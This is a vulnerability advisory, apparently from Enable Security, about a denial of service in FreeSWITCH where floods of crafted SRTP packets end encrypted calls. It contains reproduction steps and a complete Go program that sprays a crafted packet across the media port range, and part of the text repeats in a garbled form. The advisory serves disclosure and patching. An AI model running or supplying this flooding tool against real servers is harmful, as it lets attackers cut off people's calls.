Summary
When handling SRTP calls, FreeSWITCH is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack.
Description
When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment.
The call disconnection occurs due to line 6331 in the source file switch_rtp.c, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100):
if (errs >= MAX_SRTP_ERRS) {
// ...
switch_channel_hangup(channel, SWITCH_CAUSE_SRTP_READ_ERROR);
}Impact
By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller's or the callee's network.
How to reproduce the issue
- Prepare a FreeSWITCH instance that is publicly available and that can handle SRTP calls (
<X-PRE-PROCESS cmd="set" data="rtp_secure_media=true"/>)
- Prepare two SIP clients that can handle SRTP communication, such as Zoiper, and register against the FreeSWITCH instance
- Prepare an attacker machine which has a different IP than that of the caller, callee or the FreeSWITCH instance
- Save the below Go code and compile the application, naming it
freeswitch-srtp-dos
- Copy
freeswitch-srtp-dos to the attacker machine
- Perform a call between the agents using SRTP
- Run the
freeswitch-srtp-dos application against the target FreeSWITCH server: ./freeswitch-srtp-dos -ip <freeswitch_ip>
- Observe that when the active media ports are reached, FreeSWITCH will report "SRTP audio unprotect failed with code 21" multiple times, until the call is terminated
package main
import (
"flag"
"fmt"
"net"
)
func main() {
var minport, maxport, count int
var ip string
flag.IntVar(&minport, "min-port", 16384, "port-range minimum value")
flag.IntVar(&maxport, "max-port", 32768, "port-range maximum value")
flag.IntVar(&count, "count", 200, "packet count per port")
flag.StringVar(&ip, "ip", "", "target IPv4 address")
flag.Parse()
listener, err := net.ListenPacket("udp", "0.0.0.0:0")
if err != nil {
panic(err)
}
fmt.Printf("sending %d packets on each port, port range %d-%d\n",
count, minport, maxport)
addr := &net.UDPAddr{IP: net.ParseIP(ip)}
for i := minport; i < maxport+1; i++ {
fmt.Printf("\rattacking port: %d", i)
addr.Port = i
for j := 0; j < count; j++ {
listener.WriteTo([]byte("\x80\x00p(\t\xcd-\x15\xfd>\\\x86A"), addr)
}
}
}Solution and recommendations
Update to FreeSWITCH version >= 1.10.7
Credit: Enable Security
Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.
sandrogauci Analyst
alfredfarrugia Analyst
Summary
When handling SRTP calls, FreeSWITCH is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack.
Description
When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment.
The call disconnection occurs due to line 6331 in the source file
switch_rtp.c, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100):Impact
By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller's or the callee's network.
How to reproduce the issue
<X-PRE-PROCESS cmd="set" data="rtp_secure_media=true"/>)freeswitch-srtp-dosfreeswitch-srtp-dosto the attacker machinefreeswitch-srtp-dosapplication against the target FreeSWITCH server:./freeswitch-srtp-dos -ip <freeswitch_ip>Solution and recommendations
Update to FreeSWITCH version >= 1.10.7
Credit: Enable Security
Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.